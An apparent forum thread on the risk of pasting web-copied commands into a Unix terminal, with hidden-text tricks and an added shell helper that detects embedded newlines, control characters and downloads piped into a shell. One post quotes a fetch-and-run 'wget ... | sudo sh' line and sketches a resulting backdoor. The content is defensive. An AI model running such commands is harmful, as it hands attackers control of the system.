As a recent blog post showed in a simple manner: Let me remind you to either paste any CLI commands you copy from a website into an editor or install some sort of checker. Otherwise you might get your Unix system easily infected with malware or other shenanigans.
It depends a bit, of course, on what kind of distro you use as well; I mean Ubuntu-based distributions that sometimes need PPAs to install certain software. You should indeed always double-check the source of the PPA link first.
This is of course aside from commands, which you should always check before use.
You can copy directly if you simply use Shift and the right arrow from the beginning; the code is hidden after the space, so it's like this: "ls (HIDDEN TEXT)-lat". If you simply put the cursor at the beginning next to ls and then shift over, you can see that there is more than what is displayed.
Well, sometimes it's just easier to copy something by marking it and pasting it with the middle mouse button, for example when downloading a file via an HTTP link. But with default terminal settings, you can engineer a text to contain hidden commands (if you haven't, try the ls -lat command from the website), so I prefer installing an add-on rather than typing 50-character HTTP links ;).
I prefer to paste into a text editor then sanity check before running. Malware is less of a risk than "stupidware". Make sure commands aren't going to cause irreparable damage before running!
These are the magical words. If the user is 'a typical user', it's no trick to, for example, have them click on the wrong thing once and suddenly their keystrokes and all files are transferred over the network, without escalating privileges, without the user knowing. Imagine if that happened in a corporation.
Particularly if the command includes something along the lines of wget -O - http://[someunknownwebsite]/install.sh | sudo sh. Before you know it you've created a reverse tunnel back door, added a user, given it full sudo and notified someone at the other end there's a server available for them to play with. You could actually have no visual feedback of what's gone on, and the last task could well be to write some innocent-looking code to the "install.sh".
1. Download code using a non-privileged user and preferably not to the server it's going to be run from.
2. View the code and manually download any other packages it's downloading.
3. Read it a couple of times through to be certain it's not doing anything untoward.
4. Edit the code to ensure that paths/users/IP addys etc. are relevant and correct.
5. DON'T RUN IT ON A PRODUCTION SERVER WITHOUT HAVING RUN IT SOMEWHERE ELSE AND PEER REVIEWED.
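
The checks discussed in this thread (hidden text inside a copied command, and a download piped straight into a shell), as an added example that is not part of any post above. check_paste is a hypothetical helper name, and the sample clipboard text is constructed with a harmless echo standing in for the hidden part.

```shell
#!/bin/sh
# Added example: vet text copied from a web page before it reaches a shell.
# check_paste (hypothetical name) reads the copied text on stdin, prints what
# it found, and returns non-zero if anything looks unsafe.
# The body runs in a subshell ( ... ) so its variables stay private.
check_paste() (
    findings=0
    text=$(cat; printf x); text=${text%x}    # preserve trailing newlines

    # Show the raw text with control characters made visible (^[ = ESC, ^M = CR).
    echo "--- copied text ---"
    printf '%s\n' "$text" | cat -v
    echo "-------------------"

    # 1. A newline inside the text makes the terminal run it the moment it is pasted.
    lines=$(printf '%s' "$text" | wc -l | tr -d ' ')
    if [ "$lines" -gt 0 ]; then
        echo "WARN: $lines embedded newline(s); pasting executes immediately"
        findings=$((findings + 1))
    fi

    # 2. Other control characters can hide or overwrite what the terminal displays.
    if printf '%s' "$text" | tr -d '\n\t' | LC_ALL=C grep -q '[[:cntrl:]]'; then
        echo "WARN: control characters present"
        findings=$((findings + 1))
    fi

    # 3. A download piped straight into a shell: nothing gets reviewed first.
    if printf '%s' "$text" |
        grep -Eq '\|[[:space:]]*(sudo[[:space:]]+)?(ba|da|z)?sh([[:space:]]|$)'; then
        echo "WARN: output is piped into a shell"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
)

# Constructed sample: the page displays "ls -lat", the clipboard holds more.
printf 'ls ; echo hidden-step\nls -lat' | check_paste || echo "=> do not paste this"
```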